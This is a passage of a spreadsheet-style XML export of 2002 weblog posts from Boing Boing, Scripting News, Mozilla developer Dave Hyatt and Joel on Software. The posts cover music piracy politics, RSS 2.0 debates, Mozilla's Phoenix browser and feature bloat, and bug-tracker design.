largely true, albeit subject to interpretation. Link[2] Discuss[3][1] http://www.snopes.com/history/american/gauge.htm
[2] http://www.benhammersley.com/archives/001404.html#001404
[3] http://www.quicktopic.com/boing/H/ibHLzVeWnweZ
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485824
Date: Not suppliedThe British government has invited the local equivalent of the RIAA to fund an 
"anti-piracy" post. As Charlie puts it, "Mr Fox, here's the new set of 
hen-house keys you ordered."     The UK music industry is to co-fund a new post at the Department for 
    Culture, Media and Sport (DCMS) to act as a link with the government in the 
    struggle with music piracy.  Link[1] Discuss[2] (_via Charlie's Diary[3]_) [1] http://news.bbc.co.uk/1/hi/entertainment/music/2276388.stm
[2] http://www.quicktopic.com/boing/H/nYc4wgMrjwLbq
[3] http://www.antipope.org/charlie/blosxom.cgi
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485805
Date: Not suppliedMoller, a public company in Davis, California, has developed a flying car.      [IMG: http://www.craphound.com/images/flyingcar.jpg] Moller International 
    has developed the first and only feasible, personally affordable, personal 
    vertical takeoff and landing (VTOL) vehicle the world has ever seen.     You've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Link[1] Discuss[2] (_Thanks, Mark!_)[1] http://www.moller.com/skycar/
[2] http://www.quicktopic.com/boing/H/kpP4y4RMJ63SA
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485786
Date: Not suppliedStefan sez:     A federal judge has determined that gas pipline manager El Paso did indeed 
    limit natural gas supplies to California, resulting in ruinous prices, 
    rolling blackouts, and smug Cato Institute flaks wagging their fingers at 
    hot-tubbers and environmentalists.     California was sitting on a juicy dotcom-era tax windfall before it all got 
    sucked away by this phony crisis.     If I were Gov. Davis, I'd sieze every private pipeline, powerline, and 
    power plant and hold them hostage until the energy industry pays back every 
    dime they extorted from the state.  Link[1] Discuss[2] (_Thanks, Stefan[3]!_)[1] http://www.nytimes.com/aponline/business/AP-Natural-Gas-Prices.html
[2] http://www.quicktopic.com/boing/H/XmSAjzMJqcXB
[3] http://www.io.com/~stefanj
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485775
Date: Not suppliedNewZoid generates fake news-headlines:     1- Miss Universe Calling For Isidore 
    2- Rumsfeld Suggests Aspirin Reduces Alzheimer's Risk 
    3- Editorial Attacks Computer System 
    4- Stressed Out? Just Call For New TV Show 
    5- Gore To Hear About It 
    6- Nurses To Be Given Their Own Passports On Iraq Action 
    7- US Arraigned In Fighting Slavery 
    8- Lisa Riley Lines Below Chaos Above  Link[1] Discuss[2] (_Thanks, Daniel[3]!_)[1] http://www.newzoid.com/nzheadlinecombo.asp
[2] http://www.quicktopic.com/boing/H/8juRS7A4p6JY
[3] http://www.newzoid.com
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485759
Date: Not supplied[IMG: http://www.craphound.com/images/nanodog.jpg] Matt "Warchalking" Jones has 
come up with a bio-dog for the latest Viridian Design Contest[1], called Von 
Neumann's Best Friend. Link[2] Discuss[3] (_Thanks, Matt[4]!_) 
[1] http://www.viridiandesign.org/notes/301-350/00332_biofuture_robot_dog_contest.html
[2] http://www.blackbeltjones.com/vonneumann/vonneumann.gif
[3] http://www.quicktopic.com/boing/H/ejEDBhNuW3Nt
[4] http://www.blackbeltjones.com/work/
</t>
  </si>
  <si>
    <t>URL: http://www.aaronsw.com/weblog/000616
Date: 2002-09-25T18:54:10-06:00One of the weirdest things I heard when listening to the Cato Institute debate 
was an economist claim "a tenet of my profession is that people won't pay for 
something they can get for free." Someone objected, using the analogy of 
bottled water. There's a far better example: The New York Times.  Incredibly, this institution puts out pages and pages of high-quality 
professional content each week and then distributes them by means of men in 
trucks across the country overnight where they sit, waiting to be sold to 
people. Meanwhile, the exact same content is available _for free_ using an 
insidious peer-to-peer downloading system called "the Web" by typing in the 
keyword "www.nytimes.com". Those people at the New York Times must not 
understand the Internet or something! More examples: the thriving shareware market, the Baen Free Library, Janis Ian 
and others. Other times, people claim that no one will create if they can't get paid. I'd 
like to introduce you to free software and just about every weblog on the 
planet.</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:6:48:40AM
Date: Wed, 25 Sep 2002 13:48:40 GMTThanks to Jenny[1] for the pointer to this Yale Law article[2] about The 
Wayback Machine removing articles about Scientology. "While Lawmeme doesn't 
know all the details of Scientology's request to the Internet Archive, 
especially the extent of websites removed, we do know that the Internet Archive 
is blocking all archived versions of one of Scientology's leading critics and 
the main target in the Google Affair, Xenu.net."[1] http://www.theshiftedlibrarian.com/2002/09/24.html#a2837
[2] http://research.yale.edu/lawmeme/modules.php?name=News&amp;file=article&amp;sid=350
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:9:59:11AM
Date: Wed, 25 Sep 2002 16:59:11 GMTLiberation: Les jouebs, stars editoriales du Web[1].[1] http://www.liberation.com/page.php?Article=55024
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:5:12:19AM
Date: Wed, 25 Sep 2002 12:12:19 GMTJeremy Bowers[1]: "None of the trackback mechanisms has reached the critical 
mass necessary to see the negative effects experienced in all other community 
models."[1] http://www.jerf.org/irights/2002/09/25.html#a2231
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:8:47:05AM
Date: Wed, 25 Sep 2002 15:47:05 GMTKen Dow reports[1] that the current version of OmniOutliner can read and write 
OPML. This means, for example, with a little Radio script (or an AppleScript) 
you could use Omni as an Instant Outliner[2].[1] http://radio.weblogs.com/0001015/images/2002/09/25/omniOutlinerWithOpml.jpg
[2] http://davenet.userland.com/2002/04/02/jonUdellOnInstantOutlining
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:5:49:00AM
Date: Wed, 25 Sep 2002 12:49:00 GMTRay Ozzie[1]: "How long before we see auto pingback generator spambots?"[1] http://www.ozzie.net/blog/2002/09/25.html#a65
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:2:46:48PM
Date: Wed, 25 Sep 2002 21:46:48 GMTJeremy Zawodny[1] on life in Silicon Valley: "I came out here to work at a 
company that has since forgotten how to innovate and take risks. Yippie."[1] http://jeremy.zawodny.com/blog/archives/000188.html#000188
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85490404
Date: Not suppliedA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U.S. copyright laws. "But why do 
    the Napsters exist, because the marketplace wants them."     Steel said that if the issue "is not on boardroom table ... then that 
    boardroom has problems."  Link[1] Discuss[2] (_Thanks, Michael!_)[1] http://story.news.yahoo.com/news?tmpl=story&amp;ncid=581&amp;e=3&amp;cid=581&amp;u=/nm/20020925/tc_nm/media_kpmg_dc
[2] http://www.quicktopic.com/boing/H/cyfuTEBbTuVRG
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:8:14:00AM
Date: Wed, 25 Sep 2002 15:14:00 GMTReuters[1]: "Pets may not only provide good company for their owners, they may 
also help lower stress, according to new study findings."[1] http://abcnews.go.com/wire/Living/reuters20020924_315.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85490332
Date: Not suppliedJust a reminder: I'm speaking at the University of Texas at Austin at 7PM this 
Friday -- giving a talk on Hollywood's legislative agenda, sponsored by 
EFF-Austin, ACTLab, and ACLU-Texas. Love to see you there! Link[1] Discuss[2][1] http://effaustin.org/cory.html
[2] http://www.quicktopic.com/boing/H/DQswgUPGs5Y
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#aProductiveThread
Date: Thu, 26 Sep 2002 00:18:04 GMT"rssflowersalignright"A productive thread[1] on RSS-DEV confronts the 
negativeness about RSS 2.0[2] head-on. This will go someplace interesting.  I left a big hint there in the way the blogChannel module[3] is designed, 
patterned after the Syndication module[4] designed by the RDF folk. In other 
words, the place where they're expressing discomfort with RSS 2.0 is where they 
can make it their own. Lead. Instead of feeling disempowered, be powerful.  At one point I saw clearly where the compromise between RSS 0.9x and 1.0 was. 
We could have gotten there in early 2001, so instead we get there in late 2002. 
So what, not a big deal. Think about how much better it will be _when we're all 
advocating the same format._ Visualize peace. That's basically what I did when 
I did the 2.0 spec. I know it's hard to swallow, but swallow anyway. If I did 
it, you can too.[1] http://groups.yahoo.com/group/rss-dev/message/4032
[2] http://backend.userland.com/rss
[3] http://backend.userland.com/blogChannelModule
[4] http://web.resource.org/rss/1.0/modules/syndication/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85490211
Date: Not suppliedGreat piece on the pulp comic characters that appear in the new series of Alan 
Moore's _League of Extraordinary Gentlemen Tom Strong_ (thanks, Zed) funnybook. 
These characters, like The Terror and The Fighting Yank, are in the public 
domain because their original publishers didn't register (or renew, it's 
unclear) their copyright, which means that they've been granted a new lease on 
life in _Tom Strong_. The article segues into a very good discussion of the 
public domain. This was just Slashdotted, so it might be a little slow, but 
it's worth the wait. Link[1] Discuss[2] (_via /.[3]_)[1] http://www.newsarama.com/public.html
[2] http://www.quicktopic.com/boing/H/MfCE7BXSmJdzp
[3] http://slashdot.org
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:5:39:47AM
Date: Wed, 25 Sep 2002 12:39:47 GMT[IMG: http://radio.weblogs.com/0001015/images/2002/09/25/uncSamMedium.gif (A 
picture named uncSamMedium.gif)][1]Last year on this day[2]: "It's been 
not-correct for most of my life for Americans to say we love our country. 
That's a big bug. We're the world's greatest country and we know it. I love the 
USA. It gave me life, an education, role models and a philosophy. And if you 
think we're stupid or decadent, just try fucking with us."[1] http://www.scripting.com/images/2001/09/22/uncleSam.jpg
[2] http://scriptingnews.userland.com/backissues/2001/09/25#bushAndTheDoves
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85490092
Date: Not suppliedBrian sez: Vocera Communications has developed what is essentially a Star Trek: 
TNG-style lapel communicator device that uses WiFi to transmit voice across 
networks.     The Vocera Communications System consists of Vocera Server Software, 
    residing on a customer premise server, and Vocera Communications Badges, 
    which operate over a wireless LAN (802.11b). The badge - which weighs less 
    than 2 ounces - includes a microphone and speaker, LCD readout to display 
    text messages, and an 802.11b wireless radio. It can be clipped to a shirt 
    pocket or collar, or worn on a lanyard.  Link[1] Discuss[2] (_Thanks, Brian[3]!_)[1] http://www.vocera.com/news/press9.shtm
[2] http://www.quicktopic.com/boing/H/F4SLvqGh6XW
[3] http://brian.carnell.com
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:6:31:40PM
Date: Thu, 26 Sep 2002 01:31:40 GMTDaypop[1] is back. _Ye-hi._[1] http://www.daypop.com/top/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:5:36:11AM
Date: Wed, 25 Sep 2002 12:36:11 GMTFred Grott: How to Keep RDF and RSS Straight[1].[1] http://www.diaries.com/ShareMe/2002/09/24
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#medicalNotes
Date: Wed, 25 Sep 2002 12:49:48 GMTMixed news from yesterday's heart checkup. First, I went seven minutes on the treadmill. That was pretty good. My heart 
was racing like it hadn't since I was in college. They also did an extensive 
ultrasound on my carotid arteries[1], they're in the neck and supply my head 
with blood. More good news there. They're clear, free of plaque, healthy, not 
diseased[2]. So it appears I just have coronary artery disease, not general 
artery disease. That's good because there would be a risk of stroke if they 
were sick, and not a whole lot they can do about it (as they can with the 
heart). Now there was some not-good news. A small part of my heart isn't working very 
well. There are a few possible reasons for that, some fixable, some not. I 
asked the doctor, does this mean I'm going to die sooner, and he said no. Does 
it mean I have to restrict what I do, he said no. So what does it mean? Really 
not much, other than I should watch, as before, for recurring symptoms, the 
ones that brought me into the hospital in June. If they come back, we'll do an 
angiogram, and maybe an angioplasty, but the likelihood of another bypass 
because of this is small. That's quite a relief. I don't like the idea of part 
of my heart not working, but what can you do about it?[1] http://www.google.com/search?hl=en&amp;lr=&amp;ie=UTF-8&amp;oe=UTF-8&amp;safe=off&amp;q=carotid+arteries&amp;spell=1
[2] http://www.vascularweb.org/doc/190
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:6:25:23AM
Date: Wed, 25 Sep 2002 13:25:23 GMTJon Hanna, on the RSS-DEV list, says[1] that RSS, was "not designed to be of 
any particular use to bloggers, aggregators, or metadata providers." This is 
not true. Half of RSS 0.91 was scriptingNews format[2], which was totally 
designed to model a weblog in XML. [1] http://groups.yahoo.com/group/rss-dev/message/4023
[2] http://my.userland.com/stories/storyReader$11
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:12:25:19PM
Date: Wed, 25 Sep 2002 19:25:19 GMTEd Cone[1]: "The House Subcommittee on Courts, the Internet, and Intellectual 
Property will hold a hearing on 'Piracy of Intellectual Property on 
Peer-to-Peer Networks' at 9AM., Thursday, September 26, (2141 Rayburn House 
Office Building). The Berman-Coble bill will be discussed. The hearings are 
open to the press."[1] http://radio.weblogs.com/0107946/2002/09/25.html#a187
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:3:23:55PM
Date: Wed, 25 Sep 2002 22:23:55 GMTGracie Allen[1]: "Never put a period where God has placed a comma."[1] http://www.inspirationpeak.com/archives/2001/012301.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:5:34:49AM
Date: Wed, 25 Sep 2002 12:34:49 GMTGreat email[1] from the RIAA's Hillary Rosen to execs at Yahoo, Real, AOL and 
Microsoft, on how to crack down on the millions of Morpheus and Kazaa users. Is 
this for real?[1] http://www.dotcomscoop.com/article.php?sid=40
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:8:33:10AM
Date: Wed, 25 Sep 2002 15:33:10 GMTWired[1]: "Stronger ties between ISPs and file-trading companies could bolster 
Kazaa's defenses."[1] http://www.wired.com/news/mp3/0,1285,55356,00.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:7:04:44AM
Date: Wed, 25 Sep 2002 14:04:44 GMTBen Silverman, the publisher of Dotcom Scoop, says the Rosen email is real, and 
part of a confidential internal memo[1] that outlines the RIAA's legal strategy 
re Kazaa, Music City and Grokster. [1] http://www.dotcomscoop.com/article.php?sid=39
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000615
Date: 2002-09-25T17:11:31-06:00You can see Cory Doctorow explain the problems with the Berman Bill while his 
host subscribes to the EFF Action Center on TechTV[1] if you've got Windows 
Media Player. If you're on Windows, you can also hear them. (The Mac version 
doesn't seem to have the codec for the sound.) [IMG: http://www.archive.org/images/P1010028-s.jpg][2]The Internet Archive Bookmobile, starring the Kahles[3]. Seth[4]: "I had a dream that I went to D.C. to hear the Eldred argument and 
also dropped by a party to celebrate it. [...] y dream Supreme Court was 
definitely going to reverse the court below, if only because the Solicitor 
General in my dream had hardly found anything good to say about the CTEA. _
Adsit omen! _"
Donna of Copyfight linked to my fair use notes[5]. An archived stream of the Tauzin hearing will be available soon[6].[1] http://www.techtv.com/screensavers/opinion/story/0,24330,3399006,00.html
[2] http://www.archive.org/images/P1010028-m.jpg
[3] http://www.kahle.org/Brewster/
[4] http://vitanuova.loyalty.org/2002-09-24.html
[5] http://www.corante.com/copyfight/20020901.shtml#7432
[6] http://energycommerce.house.gov/107/hearings/09252002Hearing719/hearing.htm
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:5:24:45AM
Date: Wed, 25 Sep 2002 12:24:45 GMTJohn Robb[1]: "Yesterday, AT&amp;T upgraded my cable box to a digital system."[1] http://jrobb.userland.com/2002/09/25.html#a2595
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/25.html#foaf_explorer
Date: 2002-09-25T18:18:53-05:00Morten Frederiksen has taken a first stab at a real-time social network 
explorer based on FOAF files. You could start on my profile[1] and explore from 
there, or enter the URL of your own FOAF file (at the bottom of the page). It's 
heavy on tech details, but you can easily see the potential here. (It's also a 
great way to debug your FOAF file, if you added anything manually.) Now we need 
somebody to build a spider that follows foaf:knows links and draws pretty 
social network diagrams, so we can see the forest for the trees.[1] http://xml.mfd-consult.dk/foaf/?foaf=http%3A%2F%2Fdiveintomark.org%2Fpublic%2Ffoaf.rdf
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/25.html#maps
Date: 2002-09-25T10:45:15-05:00_Mark Tosczak_: A New Way to Read, Not See, Maps[1]. â€œThe map-navigation 
software, dubbed Blind Audio Tactile Mapping System ... takes digital map 
information and provides nonvisual feedback as a user moves a cursor across the 
map.â€[1] http://www.wired.com/news/school/0,1383,54916,00.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/25.html#plan
Date: 2002-09-25T10:43:06-05:00_Paul Ford_: Falling Off a Truck[1]. â€œIn the last 4 days I fell off a 
truck and was dragged for 30 feet, and was interviewed by an NPR show. Those 
two facts are not related except that they both happened to me and made me 
queasy. I also wrote a short plan outlining the rest of my life.â€[1] http://ftrain.com/recent_update_etc.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85494359
Date: Not suppliedAmazing story about the "dabba wallahs" -- India's 112-year-old meal-delivery 
system that outdoes FedEx using pictograms, bicycles, and largely illiterate 
(but well-compensated)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re-sorted, this time according to street address and floor.     The 80 kg crates of carriers, carried on dabba wallahs' heads, hand-wagons 
    and cycles are delivered at 12.30 p.m., picked up at 1.30 p.m., and 
    returned when they came.     The system relies on multiple relays of dabba wallahs, and a single tiffin 
    box may change hands up to three times during its journey from home to 
    office.  Link[1] Discuss[2] (_Thanks, Tom!_)[1] http://in.news.yahoo.com/020920/43/1vfdw.html
[2] http://www.quicktopic.com/boing/H/H96NaZc8PTyq
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.mozillazine.org/weblogs/hyatt/#85471617
Date: Not suppliedA lot of people seem to be missing the point of Phoenix, as evidenced by the 
responses on Mozilla News[1] and MozillaZine[2]. Let me emphasize something 
here: if you think Mozilla's current UI is acceptable, then you are clearly not 
the target audience for Phoenix.Here is a quiz to test whether or not Phoenix is the right browser for you.
- The link toolbar is: 
- critical to my day-to-day use 
- vital when using Bugzilla! Doesn't everybody use Bugzilla?
-  link what?- The sidebar is 
- indispensable since i run at 1600x1200 resolution 
- not cool enough, since i can't float and dock all my panels and have 
splitters between all panels and see web page progress for individual HTML 
panels and check my email entirely from within sidebar and... 
- a waste of real estate- Form auto-fill 
- is not useful for me unless I can fill out 20 pages of personal information 
first 
- should just happen automatically- Downloads 
- should take place in a tree view with progress meters in the columns! 
- should be clearly visible and understandable.- Toolbars should 
-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 be customizable within reason- Composer should 
- always come with my browser. I want composer options all over my UI. 
Everywhere! 
- not be part of a Web browser.- Mail should 
- be part of my browser program. Aren't they the same app? There is a 
difference? 
- be a separate application.
Now to those people who want the full-blown functionality of the Mozilla trunk, 
you can still get that with Phoenix. The idea is to relegate more features to 
the "optional add-on" category. If you want the link toolbar or the sidebar or 
mouse gestures or any other features, you can download and install them 
yourself. I expect Phoenix will have a little add-in manager that will 
facilitate this process. There is currently an expectation on the part of an 
alarming number of people that every feature implemented by anyone should 
automatically be part of the default Mozilla install/download. Why? A layered approach scales better. You can then have a browser that can become 
as complex as you want to make it, but the choice is left in your hands. The 
geek features aren't inflicted on you by default.Finally, remember that Phoenix's UI is not controlled by Netscape. This is an 
opportunity for some of the core Mozilla Navigator developers to build the 
browser that they have always wanted to build, without having to compromise the 
user interface to satisfy the various conflicting pressures exerted by factions 
within Netscape.[1] http://www.mozillanews.org
[2] http://www.mozillazine.org
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.mozillazine.org/weblogs/hyatt/#85443841
Date: Not suppliedBug 22056 has to do with enabling different toolbar modes. It's a pretty basic 
browser feature that has been missing from Navigator for years. Even simplified 
browsers like Chimera have this feature. Neil did some excellent work in 22056 
and his code finally landed. It naturally spiked startup time and window time 
slightly, and so it ended up being backed out because of Mozilla's no tolerance 
policy for regressions.While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3000 menu items? You still support every last 
feature since version 1.0, so no customers can possibly be dissatisfied!You can really only cram so many features into a product before its size 
requirements and performance requirements have to change. This is an obvious 
rule. It's like you start with an empty elevator that says "Capacity: 10 
people." The elevator stops at the first floor (version 1.0) and a bunch of 
people (features) get on. Continuing on its journey, the elevator stops at the 
second floor, and still more people get on. The elevator is now full, and it 
continues to the third floor (version 3.0). Unfortunately the elevator is full, 
but there are a bunch of people waiting at the third floor to get on. Some of 
them squeeze in anyway, past the fat person from the first floor (the Mozilla 
sidebar feature) who is taking up enough space for 3 people. Everyone wishes 
he'd get off at the third floor or even the fourth floor, but he doesn't. 
Someone (the Mozilla wallet feature) from the second floor cuts one on the way 
to the third floor, so he's useless, and everyone wishes he'd get off too. He 
doesn't though. Nobody does. People keep piling in at floor after floor, until 
eventually the elevator support cable snaps and everybody dies.We need to forcibly eject people from the elevator. Remove the features that 
nobody wants and replace them with the features that matter. Cull out the 
features that didn't work in Mozilla 1.0 and make sure they aren't there in 
Mozilla 2.0. Make more of the features optional plugins so that geeks who want 
some of the more obscure features (and that have powerhouse machines) can go 
download them on their own. Only if we actively fight the trend towards bloat 
will we finally produce an awesome Mozilla browser.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85494705
Date: Not supplied[IMG: http://www.craphound.com/images/tapedup.jpg] Duct-tapers are mainstream 
bondage fetishists who tape each other up to walls and ceilings "just to see if 
it will hold." Pervs. Link[1] Discuss[2] (_Thanks Steve[3]!_) 
[1] http://www.octanecreative.com/ducttape/walltapings/index.html
[2] http://www.quicktopic.com/boing/H/pG33EGvsJQ8
[3] http://www.mindspring.com/~steve.portigal
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.mozillazine.org/weblogs/hyatt/#85399441
Date: Not suppliedTony Davis wrote in his blog:_All Mozilla did is steal Netscape's thunder. _True, but if Netscape had actually bothered to put valuable additions into its 
product, then that wouldn't have happened. Similarly, if Netscape hadn't taken 
away valuable features from Mozilla, then maybe people would actually want to 
use Netscape over Mozilla.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.mozillazine.org/weblogs/hyatt/#85409355
Date: Not suppliedBlake blogs[1] about how mpt[2] wants Mozilla to look just like MSIE. I have to 
admit, the evidence is pretty compelling. I recall someone asking me, "Do you 
really agree with mpt's Top 10 list? He's quoted you at the top of the list!"Do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That's something.To cover the list specifically:
- Navigator chrome structure - While I don't necessarily agree with mpt's 
proposed default configuration, I do agree that the chrome structure is 
painfully restrictive, and that customizable toolbars need to be implemented in 
order for us to acquire the flexibility to deal with this problem.- Speed - can't argue with this, except to say that cutting out a lot of the 
useless UI and features from the chrome helps substantially. Reduce bloat, gain 
speed.- Text editing - if you use Chimera on the Mac, you'll see that the textfield 
widget is easily the most painful part of the entire application. It's buggy, 
slow, misbehaves, and doesn't edit the way you'd expect. This is IMO Chimera's 
top usability problem.- Message display - Yes. No argument here.- Search - Yeah, it's a mess. Don't know if it would be in my top ten, but it's 
a mess.- Menu structure - This gets back to my blog about how the apps should be 
separated. The menu structure has been complicated in order to deal with 
multiple applications. A clean separation naturally simplifies the menus (e.g., 
you can eliminate the New submenu easily).- Migration - A problem, but IMO not one of the top ten facing Mozilla.- Context menus - mpt complains about two-click context menus, and yet, the OS 
default on Win32 (overwhelmingly) is to bring up a context menu on a mouse up. 
If you don't like it, complain about Win32, but don't cite this as a Mozilla 
usability problem when we're following the conventions of the operating system. 
(We simply listen for the WM_CONTEXTMENU message. That message fires when Win32 
wants to fire it.)- Validation - Err, no. Not a usability problem. To the average bear, this is 
completely irrelevant.- Preferences -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overconfigurable.[1] http://www.blakeross.com/archives/2002_08_18_index.html#80418641
[2] http://mpt.phrasewise.com
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85494694
Date: Not suppliedSome of the words in the new shorter Oxford English Dictionary:     Asylum seeker, economic migrant, bed-blocking, and stakeholder pension 
    reflect the serious side of life; bunny-hugger (a conservationist or animal 
    lover), chick flick (a film appealing to women), gearhead (a car 
    enthusiast), and Grinch (a spoilsport or killjoy) are entries in a more 
    light-hearted vein. Several entries are testaments to the popularity of 
    science fiction, among them Tardis from the TV series Doctor Who, Jedi from 
    Star Wars, and Klingon from Star Trek.  Link[1] Discuss[2] (_Thanks, Mark!_)[1] http://www.askoxford.com/worldofwords/wordfrom/shorter/
[2] http://www.quicktopic.com/boing/H/2tC5tCQqCRD3b
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.joelonsoftware.com/news/20020912.html
Date: Not suppliedWe're trying to decide if FogBUGZ[1] 3.0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programmer-assignee look at the bug first, and if they think it might be 
dll-version-related, only _then_ bounce the bug back to the originator asking 
for the DLL info? Similarly, it's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can't. Ever. Even with the custom field. Because not 
every bug has been regressed on every version of every operating system, so 
this search doesn't make sense in the first place. The info wasn't captured. Do 
a full text search for 98SE and you'll find some of them. Life is imperfect.) Life would be more perfect if every bug report included megabytes of 
information -- a complete dump of every byte on the hard drive and in RAM on 
the computer in question and while you're at it, a photograph of the tester's 
workspace. But the goal of a bug tracking database is to _keep track of bugs_, 
which, all else being equal, takes priority over making it easy to find them. I 
have heard countless stories of development teams where the bug tracking 
package was so high-ceremony that people were afraid to enter bugs in the 
system, because they didn't know what all those fields were. The _real_ 
bug-"tracking" happened in email, post-its, and hallway conversations. Great. A pretty common question we get on the customer service line is, "does 
FogBUGZ support custom fields?" Rather than giving our usual answer ("no. on 
purpose.") over the last few weeks I've been saying, "can you please tell me 
what fields you would need? We're trying to decide whether to implement that 
feature in 3.0 and we want to know why people need it." The interesting thing 
is, almost all of the fields people ask for _are already in FogBUGZ,_ and the 
other ones, in my educated opinion, shouldn't be fields. And in fact, our 
existing customers are certainly happy without custom fields. One of our 
biggest site licenses was sold to a semiconductor company, and I myself wanted 
to add a custom field for them to keep track of versions of the circuit design, 
but I didn't, and they never needed it (even though they had been keeping track 
of it with the old bug tracking package which had custom fields), and they are 
happy and keep buying more site licenses. But the dilemma for us is that many customers are evaluating bug tracking 
software and they consider the lack of custom fields to be a major weakness in 
our product. "Gosh, even Filemaker has custom fields." Righto. It's true. And 
who am I to tell my customers they are wrong? One person who I was talking to 
yesterday would have used a custom field for something that we already have a 
built-in field for. This would have made their database confusing and 
inconsistent and would have definitely caused more problems than it solved. But 
it's still rude of me to tell customers that we don't have that feature _for 
their own good_, even though it usually is, and we're losing some sales because 
of it. Sigh. I guess we could have a custom fields feature but hide it and make it so 
hard to use that people don't use it. At least we won't lose any sales :)[1] http://www.fogcreek.com/FogBUGZ
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.joelonsoftware.com/news/20020925.html
Date: Not suppliedEddie Kessler describes programming at Napster[1]. Ray Ozzie has more on platforms[2]. "Finding the 'right' price point for a 
software platform is critical." To me this sounds like a fancy way of saying, 
"I groove all that stuff about how platforms need to be cheap and ubiquitous, 
but I can't bring myself to do it." The price, Ray says, "must be high enough 
both 1) to maintain a perception of value in the platform, and 2) to create 
significant margins well before ubiquity is assured so that the ecosystem is 
assured of the platform's ultimate viability." What he doesn't mention: if you 
lower the price on the only product you're selling, you have a revenue hit, 
which will not make your investors happy, and you may run out of money and have 
to close. But that must be what he's thinking.[1] http://www.joelonsoftware.com/articles/WorstProjectEver.html
[2] http://www.ozzie.net/blog/stories/2002/09/24/softwarePlatformDynamics.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.mozillazine.org/weblogs/hyatt/#85395270
Date: Not suppliedI feel so tremendously validated right now in all my criticisms of Netscape vs. 
Mozilla. I told Netscape management that if the Netscape beta shipped without 
popup blocking that CNet would write an article on it. They didn't believe me 
(or didn't care). Sure enough, the article appeared right on time[1].I blogged about two main annoyances when installing Netscape 7: the lack of 
popup blocking and all of the annoying advertising spam on the desktop and in 
the toolbars. I warned Netscape that they needed to take steps to correct this 
problem. They didn't listen. Take a look at the CNet review[2] highlight that 
describes *The Bad* part of Netscape 7.0:_Displays AOL ads everywhere; doesn't let you turn off pop-up windows like 
Mozilla does; devours 30MB of disk space._Plenty of other engineers at Netscape (as well as managers) complained about 
these problems and fought with those higher up to correct these problems. We 
lost every battle. The simple truth is that the people in charge of running the 
Netscape browser are incompetent. They don't understand how to make a good 
browser, or they don't care. Their engineers tell them what they're doing 
wrong, and they don't listen. Maybe you'll listen to the public. How about eWeek's article, Netscape 7.0 
Shrivels Under Mozilla's Shadow[3]? Are you paying attention now, you ignorant, 
stupid, incompetent buffoons?"I told you so." never felt so good.Maybe they will sit up and take notice now. If they do, well, it's about 
fucking time. And people wonder why I quit working for AOL.
[1] http://news.com.com/2100-1023-949572.html?tag=fd_lede
[2] http://www.cnet.com/software/0-3227883-8-20331576-1.html?tag=st.sw.8888.boxhl.3227883-8-20331576-1
[3] http://www.eweek.com/article2/0,3959,493248,00.asp
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.joelonsoftware.com/news/20020917.html
